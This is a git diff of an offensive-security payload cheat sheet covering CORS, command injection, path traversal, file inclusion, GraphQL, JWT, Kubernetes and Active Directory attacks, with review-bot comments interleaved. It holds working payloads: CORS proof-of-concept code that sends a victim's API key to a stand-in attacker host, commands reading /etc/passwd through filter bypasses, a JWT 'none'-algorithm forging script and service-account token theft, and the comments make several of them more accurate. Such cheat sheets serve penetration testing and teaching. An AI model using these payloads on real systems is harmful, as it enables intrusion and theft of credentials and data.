diff --git a/API Key Leaks/README.md b/API Key Leaks/README.md index 8be1b6f..b3768b0 100644 --- a/API Key Leaks/README.md +++ b/API Key Leaks/README.md @@ -16,6 +16,7 @@ - [Twitter API Secret](#twitter-api-secret) - [Twitter Bearer Token](#twitter-bearer-token) - [Gitlab Personal Access Token](#gitlab-personal-access-token) + - [HockeyApp API Token](#hockeyapp-api-token) - [Auth Bypass using pre-published Machine Key](#auth-bypass-using-pre-published-machine-key) @@ -98,6 +99,13 @@ curl "https://gitlab.example.com/api/v4/projects?private_token= By default, ASP.NET creates a Forms Authentication Ticket with unique a username associated with it, Date and Time at which the ticket was issued and expires. So, all you need is just a unique username and a machine key to create a forms authentication token @@ -125,4 +133,5 @@ $ AspDotNetWrapper.exe --decryptDataFilePath C:\DecryptedText.txt * [Finding Hidden API Keys & How to use them - Sumit Jain - August 24, 2019](https://medium.com/@sumitcfe/finding-hidden-api-keys-how-to-use-them-11b1e5d0f01d) * [Private API key leakage due to lack of access control - yox - August 8, 2018](https://hackerone.com/reports/376060) -* [Project Blacklist3r - November 23, 2018 - @notsosecure](https://www.notsosecure.com/project-blacklist3r/) \ No newline at end of file +* [Project Blacklist3r - November 23, 2018 - @notsosecure](https://www.notsosecure.com/project-blacklist3r/) +* [Saying Goodbye to my Favorite 5 Minute P1 - Allyson O'Malley - January 6, 2020](https://www.allysonomalley.com/2020/01/06/saying-goodbye-to-my-favorite-5-minute-p1/) \ No newline at end of file diff --git a/CORS Misconfiguration/README.md b/CORS Misconfiguration/README.md index dcf5bfc..138fb1c 100644 --- a/CORS Misconfiguration/README.md +++ b/CORS Misconfiguration/README.md 
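Review bot: the references hunk in `API Key Leaks/README.md` still ends without a trailing newline (`\ No newline at end of file` is attached to the new `Saying Goodbye to my Favorite 5 Minute P1` entry), so the next reference appended here will again show up as a noisy two-line diff; add the newline while the file is being touched. The summary entry added above links to `#hockeyapp-api-token`, so the heading introduced by the `@@ -98,6 +99,13 @@` hunk must be spelled exactly `HockeyApp API Token` for the anchor to resolve.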
@@ -1,90 +1,185 @@ -# CORS Misconfiguration - -> A site-wide CORS misconfiguration was in place for an API domain. This allowed an attacker to make cross origin requests on behalf of the user as the application did not whitelist the Origin header and had Access-Control-Allow-Credentials: true meaning we could make requests from our attacker’s site using the victim’s credentials. - -## Summary - -* [Prerequisites](#prerequisites) -* [Exploitation](#exploitation) -* [References](#references) - -## Prerequisites - -* BURP HEADER> `Origin: https://evil.com` -* VICTIM HEADER> `Access-Control-Allow-Credential: true` -* VICTIM HEADER> `Access-Control-Allow-Origin: https://evil.com` - -## Exploitation - -Usually you want to target an API endpoint. Use the following payload to exploit a CORS misconfiguration on target **https://victim.example.com/endpoint**. - -### Vulnerable example - -```powershell -GET /endpoint HTTP/1.1 -Host: victim.example.com -Origin: https://evil.com -Cookie: sessionid=... - -HTTP/1.1 200 OK -Access-Control-Allow-Origin: https://evil.com -Access-Control-Allow-Credentials: true - -{"[private API key]"} -``` - -### Proof of concept - -```js -var req = new XMLHttpRequest(); -req.onload = reqListener; -req.open('get','https://victim.example.com/endpoint',true); -req.withCredentials = true; -req.send(); - -function reqListener() { - location='//atttacker.net/log?key='+this.responseText; -}; -``` - -or - -```html - - -

CORS PoC

-
- -
- - - -``` - -## Bug Bounty reports - -* [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax)](https://hackerone.com/reports/168574) -* [CORS misconfig | Account Takeover - niche.co - Rohan (nahoragg)](https://hackerone.com/reports/426147) -* [Cross-origin resource sharing misconfig | steal user information - bughunterboy (bughunterboy)](https://hackerone.com/reports/235200) -* [CORS Misconfiguration leading to Private Information Disclosure - sandh0t (sandh0t)](https://hackerone.com/reports/430249) -* [[██████] Cross-origin resource sharing misconfiguration (CORS) - Vadim (jarvis7)](https://hackerone.com/reports/470298) - -## References - -* [Think Outside the Scope: Advanced CORS Exploitation Techniques - @Sandh0t - May 14 2019](https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397) -* [Exploiting CORS misconfigurations for Bitcoins and bounties - James Kettle | 14 October 2016](https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties) -* [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - DECEMBER 16, 2016](https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/) -* [Advanced CORS Exploitation Techniques - Corben Leo - June 16, 2018](https://www.corben.io/advanced-cors-techniques/) \ No newline at end of file +# CORS Misconfiguration + +> A site-wide CORS misconfiguration was in place for an API domain. This allowed an attacker to make cross origin requests on behalf of the user as the application did not whitelist the Origin header and had Access-Control-Allow-Credentials: true meaning we could make requests from our attacker’s site using the victim’s credentials. 
+ +## Summary + +* [Tools](#tools) +* [Prerequisites](#prerequisites) +* [Exploitation](#exploitation) +* [References](#references) + +## Tools + +* [Corsy - CORS Misconfiguration Scanner](https://github.com/s0md3vCorsy/) + +## Prerequisites + +* BURP HEADER> `Origin: https://evil.com` +* VICTIM HEADER> `Access-Control-Allow-Credential: true` +* VICTIM HEADER> `Access-Control-Allow-Origin: https://evil.com` OR `Access-Control-Allow-Origin: null` + +## Exploitation + +Usually you want to target an API endpoint. Use the following payload to exploit a CORS misconfiguration on target **https://victim.example.com/endpoint**. + +### Vulnerable Example: Origin Reflection + +#### Vulnerable Implementation + +```powershell +GET /endpoint HTTP/1.1 +Host: victim.example.com +Origin: https://evil.com +Cookie: sessionid=... + +HTTP/1.1 200 OK +Access-Control-Allow-Origin: https://evil.com +Access-Control-Allow-Credentials: true + +{"[private API key]"} +``` + +#### Proof of concept + +```js +var req = new XMLHttpRequest(); +req.onload = reqListener; +req.open('get','https://victim.example.com/endpoint',true); +req.withCredentials = true; +req.send(); + +function reqListener() { + location='//atttacker.net/log?key='+this.responseText; +}; +``` + +or + +```html + + +

CORS PoC

+
+ +
+ + + +``` + +### Vulnerable Example: Null Origin + +#### Vulnerable Implementation + +It's possible that the server does not reflect the complete `Origin` header but +that the `null` origin is allowed. This would look like this in the server's +response: + +``` +GET /endpoint HTTP/1.1 +Host: victim.example.com +Origin: null +Cookie: sessionid=... + +HTTP/1.1 200 OK +Access-Control-Allow-Origin: null +Access-Control-Allow-Credentials: true + +{"[private API key]"} +``` + +#### Proof of concept + +This can be exploited by putting the attack code into an iframe using the data +URI scheme. If the data URI scheme is used, the browser will use the `null` +origin in the request: + +```html + +``` + +### Vulnerable Example: XSS on Trusted Origin + +If the application does implement a strict whitelist of allowed origins, the +exploit codes from above do not work. But if you have an XSS on a trusted +origin, you can inject the exploit coded from above in order to exploit CORS +again. + +``` +https://trusted-origin.example.com/?xss= +``` + +### Vulnerable Example: Wildcard Origin `*` without Credentials + +If the server responds with a wildcard origin `*`, the browser does never send +the cookies. However, if the server does not require authentication, it's still +possible to access the data on the server. This can happen on internal servers +that are not accessible from the Internet. The attacker's website can then +pivot into the internal network and access the server's data withotu +authentication. 
+ +#### Vulnerable Implementation + +```powershell +GET /endpoint HTTP/1.1 +Host: api.internal.example.com +Origin: https://evil.com + +HTTP/1.1 200 OK +Access-Control-Allow-Origin: * + +{"[private API key]"} +``` + +#### Proof of concept + +```js +var req = new XMLHttpRequest(); +req.onload = reqListener; +req.open('get','https://api.internal.example.com/endpoint',true); +req.send(); + +function reqListener() { + location='//atttacker.net/log?key='+this.responseText; +}; +``` + +## Bug Bounty reports + +* [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax)](https://hackerone.com/reports/168574) +* [CORS misconfig | Account Takeover - niche.co - Rohan (nahoragg)](https://hackerone.com/reports/426147) +* [Cross-origin resource sharing misconfig | steal user information - bughunterboy (bughunterboy)](https://hackerone.com/reports/235200) +* [CORS Misconfiguration leading to Private Information Disclosure - sandh0t (sandh0t)](https://hackerone.com/reports/430249) +* [[██████] Cross-origin resource sharing misconfiguration (CORS) - Vadim (jarvis7)](https://hackerone.com/reports/470298) + +## References + +* [Think Outside the Scope: Advanced CORS Exploitation Techniques - @Sandh0t - May 14 2019](https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397) +* [Exploiting CORS misconfigurations for Bitcoins and bounties - James Kettle | 14 October 2016](https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties) +* [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - DECEMBER 16, 2016](https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/) +* [Advanced CORS Exploitation Techniques - Corben Leo - June 16, 2018](https://www.corben.io/advanced-cors-techniques/) +* [PortSwigger Web Security Academy: CORS](https://portswigger.net/web-security/cors) 
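Review bot: the Corsy link in the new Tools list is broken: `https://github.com/s0md3vCorsy/` is missing the slash between user and repository and should be `https://github.com/s0md3v/Corsy`. In the Prerequisites list the response header is still written `Access-Control-Allow-Credential: true`; the real header is `Access-Control-Allow-Credentials` (plural), which matters because readers grep responses for that exact string. The wildcard section says the browser "does never send the cookies" when `Access-Control-Allow-Origin: *` comes back; what actually happens is that a request made with `withCredentials = true` still carries the cookies, but the browser refuses to expose the response because `*` cannot be combined with `Access-Control-Allow-Credentials: true`, and the PoC below simply omits `withCredentials`, so the request is anonymous. Reword to "the browser will not expose a credentialed response to `*`". Minor wording in the same hunk: `withotu` should be `without`, `exploit coded from above` should be `exploit code from above`, `does never send` should be `never sends`, and both PoCs spell the logging host `atttacker.net`. The Summary also lacks an entry for the `Bug Bounty reports` section that follows.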
diff --git a/Command Injection/README.md b/Command Injection/README.md index 8370522..5421c54 100644 --- a/Command Injection/README.md +++ b/Command Injection/README.md @@ -111,8 +111,9 @@ something%0Acat%20/etc/passwd ### Bypass characters filter via hex encoding -linux -``` +Linux + +```powershell swissky@crashlab▸ ~ ▸ $ echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64" /etc/passwd @@ -136,14 +137,13 @@ swissky@crashlab▸ ~ ▸ $ xxd -r -ps <(echo 2f6574632f706173737764) swissky@crashlab▸ ~ ▸ $ cat `xxd -r -ps <(echo 2f6574632f706173737764)` root:x:0:0:root:/root:/bin/bash - ``` ### Bypass characters filter Commands execution without backslash and slash - linux bash -``` +```powershell swissky@crashlab▸ ~ ▸ $ echo ${HOME:0:1} / @@ -158,7 +158,6 @@ swissky@crashlab▸ ~ ▸ $ tr '!-0' '"-1' <<< . swissky@crashlab▸ ~ ▸ $ cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd root:x:0:0:root:/root:/bin/bash - ``` ### Bypass Blacklisted words diff --git a/Directory Traversal/README.md b/Directory Traversal/README.md index ec975de..3993305 100644 --- a/Directory Traversal/README.md +++ b/Directory Traversal/README.md @@ -123,6 +123,14 @@ An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software ### Interesting Windows files +Always existing file in recent Windows machine. +Ideal to test path traversal but nothing much interesting inside... + +```powershell +c:\windows\system32\license.rtf +c:\windows\system32\eula.txt +``` + Interesting files to check out (Extracted from https://github.com/soffensive/windowsblindread) ```powershell 
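Review bot: the new sentence in the Windows files section is ungrammatical: `Always existing file in recent Windows machine. Ideal to test path traversal but nothing much interesting inside...` reads better as `Files that always exist on a recent Windows machine: ideal for confirming a traversal, although their contents are not interesting.` In the Command Injection hunks on the same line, the two blocks that were retagged from no language to `powershell` contain bash sessions (`echo -e`, `xxd -r -ps <(...)`, `${HOME:0:1}`), so `bash` is the accurate fence tag; tagging them `powershell` only mis-highlights the process substitution and parameter expansion.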
@@ -167,5 +175,6 @@ The following log files are controllable and can be included with an evil payloa ## References +* [Path Traversal Cheat Sheet: Windows](https://gracefulsecurity.com/path-traversal-cheat-sheet-windows/) * [Directory traversal attack - Wikipedia](https://en.wikipedia.org/wiki/Directory_traversal_attack) * [CWE-40: Path Traversal: '\\UNC\share\name\' (Windows UNC Share) - CWE Mitre - December 27, 2018](https://cwe.mitre.org/data/definitions/40.html) diff --git a/File Inclusion/README.md b/File Inclusion/README.md index 964961a..178729e 100644 --- a/File Inclusion/README.md +++ b/File Inclusion/README.md @@ -289,6 +289,8 @@ Just append your PHP code into the log file by doing a request to the service (A ```powershell http://example.com/index.php?page=/var/log/apache/access.log http://example.com/index.php?page=/var/log/apache/error.log +http://example.com/index.php?page=/var/log/apache2/access.log +http://example.com/index.php?page=/var/log/apache2/error.log http://example.com/index.php?page=/var/log/nginx/access.log http://example.com/index.php?page=/var/log/nginx/error.log http://example.com/index.php?page=/var/log/vsftpd.log diff --git a/GraphQL Injection/README.md b/GraphQL Injection/README.md index 3a9883b..e602f85 100644 --- a/GraphQL Injection/README.md +++ b/GraphQL Injection/README.md 
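Review bot: the log-path list in `File Inclusion/README.md` now covers Debian/Ubuntu (`/var/log/apache2/`) next to the older `/var/log/apache/` entries, but not RHEL/CentOS/Fedora, where httpd writes to `/var/log/httpd/access_log` and `/var/log/httpd/error_log` (note the underscore rather than the dot); add those two lines beside the `apache2` ones so the list is complete across the common distributions.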
@@ -22,8 +22,12 @@ ## Tools * [GraphQLmap - Scripting engine to interact with a graphql endpoint for pentesting purposes](https://github.com/swisskyrepo/GraphQLmap) +* [GraphQL-voyager - Represent any GraphQL API as an interactive graph](https://apis.guru/graphql-voyager/) * [GraphQL Security Toolkit - GraphQL Security Research Material](https://github.com/doyensec/graph-ql/) +* [Graphql-path-enum - Lists the different ways of reaching a given type in a GraphQL schema](https://gitlab.com/dee-see/graphql-path-enum) * [GraphQL IDE - An extensive IDE for exploring GraphQL API's](https://github.com/andev-software/graphql-ide) +* [InQL - A Burp Extension for GraphQL Security Testing](https://github.com/doyensec/inql) +* [Insomnia - Cross-platform HTTP and GraphQL Client](https://insomnia.rest/) ## Exploit 
@@ -152,6 +156,34 @@ query IntrospectionQuery { } ``` +Single line query to dump the database schema without fragments. + +```js +__schema{queryType{name},mutationType{name},types{kind,name,description,fields(includeDeprecated:true){name,description,args{name,description,type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},defaultValue},type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},isDeprecated,deprecationReason},inputFields{name,description,type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},defaultValue},interfaces{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},enumValues(includeDeprecated:true){name,description,isDeprecated,deprecationReason,},possibleTypes{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}}},directives{name,description,locations,args{name,description,type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},defaultValue}}} +``` + +### List path + +```php +$ git clone https://gitlab.com/dee-see/graphql-path-enum +$ graphql-path-enum -i ./test_data/h1_introspection.json -t Skill +Found 27 ways to reach the "Skill" node from the "Query" node: +- Query (assignable_teams) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill +- Query (checklist_check) -> ChecklistCheck (checklist) -> Checklist (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill +- Query (checklist_check_response) -> 
ChecklistCheckResponse (checklist_check) -> ChecklistCheck (checklist) -> Checklist (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill +- Query (checklist_checks) -> ChecklistCheck (checklist) -> Checklist (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill +- Query (clusters) -> Cluster (weaknesses) -> Weakness (critical_reports) -> TeamMemberGroupConnection (edges) -> TeamMemberGroupEdge (node) -> TeamMemberGroup (team_members) -> TeamMember (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill +- Query (embedded_submission_form) -> EmbeddedSubmissionForm (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill +- Query (external_program) -> ExternalProgram (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill +- Query (external_programs) -> ExternalProgram (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill +- Query (job_listing) -> JobListing (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill +- Query (job_listings) -> JobListing (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill +- Query (me) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill +- Query (pentest) -> Pentest (lead_pentester) -> Pentester (user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill +- Query (pentests) -> Pentest (lead_pentester) -> Pentester (user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill +- Query (query) -> Query 
(assignable_teams) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill +- Query (query) -> Query (skills) -> Skill +``` ### Extract data @@ -289,4 +321,4 @@ mutation finishChannelVerificationMutation( * [HIP19 Writeup - Meet Your Doctor 1,2,3 - June 22, 2019 - Swissky](https://swisskyrepo.github.io/HIP19-MeetYourDoctor/) * [Introspection query leaks sensitive graphql system information - @Zuriel](https://hackerone.com/reports/291531) * [Graphql Bug to Steal Anyone’s Address - Sept 1, 2019 - Pratik Yadav](https://medium.com/@pratiky054/graphql-bug-to-steal-anyones-address-fc34f0374417) -* [GraphQL Batching Attack - RENATAWALLARM - DECEMBER 13, 2019](https://lab.wallarm.com/graphql-batching-attack/) \ No newline at end of file +* [GraphQL Batching Attack - RENATAWALLARM - DECEMBER 13, 2019](https://lab.wallarm.com/graphql-batching-attack/) diff --git a/Insecure Deserialization/PHP.md b/Insecure Deserialization/PHP.md index a082110..3dfa63d 100644 --- a/Insecure Deserialization/PHP.md +++ b/Insecure Deserialization/PHP.md 
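Review bot: the single-line introspection query is not a valid GraphQL document as written: it starts at `__schema{...}` without an enclosing selection set, so pasted into `?query=` it fails to parse; wrap it as `{__schema{queryType{name},...}}` (the stray comma in `deprecationReason,}` is harmless, GraphQL treats commas as whitespace). The fence tags are misleading too: the query is tagged `js` and the `graphql-path-enum` session is tagged `php`, where `graphql` and `bash` fit. Finally, the sample output announces `Found 27 ways to reach the "Skill" node` but only 15 paths follow; either paste the full output or add a `[...]` marker so readers do not think the tool miscounts.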
@@ -161,5 +161,7 @@ phpggc monolog/rce1 'phpinfo();' -s * [PHP Generic Gadget - ambionics security](https://www.ambionics.io/blog/php-generic-gadget-chains) * [POC2009 Shocking News in PHP Exploitation](https://www.owasp.org/images/f/f6/POC2009-ShockingNewsInPHPExploitation.pdf) * [PHP Internals Book - Serialization](http://www.phpinternalsbook.com/classes_objects/serialization.html) -* [TSULOTT Web challenge write-up from MeePwn CTF 1st 2017 by Rawsec](https://rawsec.ml/en/MeePwn-2017-write-ups/#tsulott-web) +* [TSULOTT Web challenge write-up from MeePwn CTF 1st 2017 by Rawsec](https://rawsec.ml/en/meepwn-2017-write-ups/#TSULOTT-Web) * [CTF writeup: PHP object injection in kaspersky CTF](https://medium.com/@jaimin_gohel/ctf-writeup-php-object-injection-in-kaspersky-ctf-28a68805610d) +* [Jack The Ripper Web challeneg Write-up from ECSC 2019 Quals Team France by Rawsec](https://rawsec.ml/en/ecsc-2019-quals-write-ups/#164-Jack-The-Ripper-Web) +* [Rusty Joomla RCE Unserialize overflow](https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41) diff --git a/JSON Web Token/README.md b/JSON Web Token/README.md index a6fb080..e186299 100644 --- a/JSON Web Token/README.md +++ b/JSON Web Token/README.md 
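Review bot: typo in the new Rawsec entry: `Jack The Ripper Web challeneg Write-up` should read `challenge`. Since the MeePwn anchor was deliberately changed from `#tsulott-web` to `#TSULOTT-Web` in the same hunk, verify that the ECSC anchor `#164-Jack-The-Ripper-Web` uses the same casing convention on the target site, as those fragment identifiers are case-sensitive.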
@@ -100,37 +100,25 @@ To exploit this vulnerability, you just need to decode the JWT and change the al However, this won't work unless you **remove** the signature -The following code is a basic test for a None algorithm. - -```python -import jwt -import base64 - -def b64urlencode(data): - return base64.b64encode(data).replace('+', '-').replace('/', '_').replace('=', '') - -print b64urlencode("{\"typ\":\"JWT\",\"alg\":\"none\"}") + \ - '.' + b64urlencode("{\"data\":\"test\"}") + '.' -``` - Alternatively you can modify an existing JWT (be careful with the expiration time) -```python -#!/usr/bin/python +```python3 +#!/usr/bin/python3 # -*- coding: utf-8 -*- -jwt = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXUyJ9.eyJsb2dpbiI6InRlc3QiLCJpYXQiOiIxNTA3NzU1NTcwIn0.YWUyMGU4YTI2ZGEyZTQ1MzYzOWRkMjI5YzIyZmZhZWM0NmRlMWVhNTM3NTQwYWY2MGU5ZGMwNjBmMmU1ODQ3OQ" -header, payload, signature = jwt.split('.') +import jwt -# Replacing the ALGO and the payload username -header = header.decode('base64').replace('HS256',"none") -payload = (payload+"==").decode('base64').replace('test','admin') +jwtToken = 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXUyJ9.eyJsb2dpbiI6InRlc3QiLCJpYXQiOiIxNTA3NzU1NTcwIn0.YWUyMGU4YTI2ZGEyZTQ1MzYzOWRkMjI5YzIyZmZhZWM0NmRlMWVhNTM3NTQwYWY2MGU5ZGMwNjBmMmU1ODQ3OQ' -header = header.encode('base64').strip().replace("=","") -payload = payload.encode('base64').strip().replace("=","") +decodedToken = jwt.decode(jwtToken, verify=False) # Need to decode the token before encoding with type 'None' +noneEncoded = jwt.encode(decodedToken, key='', algorithm=None) -# 'The algorithm 'none' is not supported' -print( header+"."+payload+".") +print(noneEncoded.decode()) + +""" +Output: +eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJsb2dpbiI6InRlc3QiLCJpYXQiOiIxNTA3NzU1NTcwIn0. +""" ``` ## JWT Signature - RS256 to HS256 
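Review bot: the replacement script only runs on PyJWT 1.x. `jwt.decode(jwtToken, verify=False)` was removed in PyJWT 2.0 (the supported form is `jwt.decode(jwtToken, options={"verify_signature": False})`, which also works on 1.7), and `jwt.encode(...)` returns `str` in 2.x, so `noneEncoded.decode()` raises `AttributeError`; either pin `PyJWT<2` in a comment or switch to the 2.x-compatible calls. The fence tag `python3` is not recognised by most Markdown highlighters, so use `python`. The header comment `Need to decode the token before encoding with type 'None'` is also slightly off: the value being set is the `alg` claim `none`, not a `typ`.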
@@ -290,4 +278,5 @@ eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMj...Fh7HgQ:secret - [How to Hack a Weak JWT Implementation with a Timing Attack - Jan 7, 2017 - Tamas Polgar](https://hackernoon.com/can-timing-attack-be-a-practical-security-threat-on-jwt-signature-ba3c8340dea9) - [HACKING JSON WEB TOKENS, FROM ZERO TO HERO WITHOUT EFFORT - Thu Feb 09 2017 - @pdp](https://blog.websecurify.com/2017/02/hacking-json-web-tokens.html) - [Write up – JRR Token – LeHack 2019 - 07/07/2019 - LAPHAZE](http://rootinthemiddle.org/write-up-jrr-token-lehack-2019/) -- [JWT Hacking 101 - TrustFoundry - Tyler Rosonke - December 8th, 2017](https://trustfoundry.net/jwt-hacking-101/) \ No newline at end of file +- [JWT Hacking 101 - TrustFoundry - Tyler Rosonke - December 8th, 2017](https://trustfoundry.net/jwt-hacking-101/) +- [JSON Web Token Validation Bypass in Auth0 Authentication API - Ben Knight Senior Security Consultant - April 16, 2020](https://insomniasec.com/blog/auth0-jwt-validation-bypass) \ No newline at end of file diff --git a/Kubernetes/readme.md b/Kubernetes/readme.md index d409dc0..984d621 100644 --- a/Kubernetes/readme.md +++ b/Kubernetes/readme.md @@ -25,6 +25,16 @@ * [katacoda](https://katacoda.com/courses/kubernetes). Learn Kubernetes using interactive broser-based scenarios. +## Service Token + +> As it turns out, when pods (a Kubernetes abstraction for a group of containers) are created they are automatically assigned the default service account, and a new volume is created containing the token for accessing the Kubernetes API. That volume is then mounted into all the containers in the pod. + +```powershell +$ cat /var/run/secrets/kubernetes.io/serviceaccount + +# kubectl makes cluster compromise trivial as it will use that serviceaccount token without additional prompting +``` + ## RBAC Configuration ### Listing Secrets 
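Review bot: `cat /var/run/secrets/kubernetes.io/serviceaccount` fails with `Is a directory`; that mount point is a directory containing `token`, `ca.crt` and `namespace`, and the bearer token the comment refers to is `/var/run/secrets/kubernetes.io/serviceaccount/token`. Fix the path, and consider listing the three files so readers also pick up the namespace, since the privileges that token actually carries depend on whatever RBAC binds the default service account, which is exactly what the following `RBAC Configuration` section tests.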
@@ -188,4 +198,5 @@ http://:10255/pods ## References - [Kubernetes Pentest Methodology Part 1 - by Or Ida on August 8, 2019](https://securityboulevard.com/2019/08/kubernetes-pentest-methodology-part-1) -- [Kubernetes Pentest Methodology Part 2 - by Or Ida on September 5, 2019](https://securityboulevard.com/2019/09/kubernetes-pentest-methodology-part-2) \ No newline at end of file +- [Kubernetes Pentest Methodology Part 2 - by Or Ida on September 5, 2019](https://securityboulevard.com/2019/09/kubernetes-pentest-methodology-part-2) +- [Capturing all the flags in BSidesSF CTF by pwning our infrastructure - Hackernoon](https://hackernoon.com/capturing-all-the-flags-in-bsidessf-ctf-by-pwning-our-infrastructure-3570b99b4dd0) \ No newline at end of file diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 395c02f..ad4ff3c 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -46,6 +46,9 @@ - [Ghost Potato - CVE-2019-1384](#ghost-potato---cve-2019-1384) - [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage) - [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces) + - [GenericAll](#genericall) + - [GenericWrite](#genericwrite) + - [WriteDACL](#writedacl) - [Trust relationship between domains](#trust-relationship-between-domains) - [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking) - [Kerberos Unconstrained Delegation](#kerberos-unconstrained-delegation) 
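Review bot: the new Hackernoon entry breaks the reference convention used by the two lines above it (`Title - by Author on Date`): it carries neither author nor date, so add at least the date to keep the list consistent. The three summary entries added in the Active Directory file (`#genericall`, `#genericwrite`, `#writedacl`) require headings with exactly those words in the ACL section; that section's hunk is cut off in this view, so please double-check that the anchors render.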
@@ -71,38 +74,50 @@ * [BloodHound](https://github.com/BloodHoundAD/BloodHound) ```powershell - apt install bloodhound #kali - neo4j console + # start BloodHound and the database + root@payload$ apt install bloodhound #kali + root@payload$ neo4j console + root@payload$ ./bloodhound Go to http://127.0.0.1:7474, use db:bolt://localhost:7687, user:neo4J, pass:neo4j - ./bloodhound - SharpHound.exe (from resources/Ingestor) - SharpHound.exe -c all -d active.htb --domaincontroller 10.10.10.100 - SharpHound.exe -c all -d active.htb --LdapUser myuser --LdapPass mypass --domaincontroller 10.10.10.100 - SharpHound.exe -c all -d active.htb -SearchForest - SharpHound.exe --EncryptZip --ZipFilename export.zip - or + + # run the ingestor on the machine using SharpHound.exe + # https://github.com/BloodHoundAD/SharpHound3 + .\SharpHound.exe (from resources/Ingestor) + .\SharpHound.exe -c all -d active.htb --domaincontroller 10.10.10.100 + .\SharpHound.exe -c all -d active.htb --LdapUser myuser --LdapPass mypass --domaincontroller 10.10.10.100 + .\SharpHound.exe -c all -d active.htb -SearchForest + .\SharpHound.exe --EncryptZip --ZipFilename export.zip + .\SharpHound.exe --CollectionMethod All --LDAPUser --LDAPPass --JSONFolder + + # or run the ingestor on the machine using Powershell + # https://github.com/BloodHoundAD/BloodHound/tree/master/Ingestors Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public - or + Invoke-BloodHound -CollectionMethod All -LDAPUser -LDAPPass -OutputDirectory + + # or remotely via BloodHound Python + # https://github.com/fox-it/BloodHound.py bloodhound-python -d lab.local -u rsmith -p Winter2017 -gc LAB2008DC01.lab.local -c all ``` * [AdExplorer](https://docs.microsoft.com/en-us/sysinternals/downloads/adexplorer) * [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec) - ```bash - apt-get install -y libssl-dev libffi-dev python-dev build-essential - git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec - crackmapexec smb -L - 
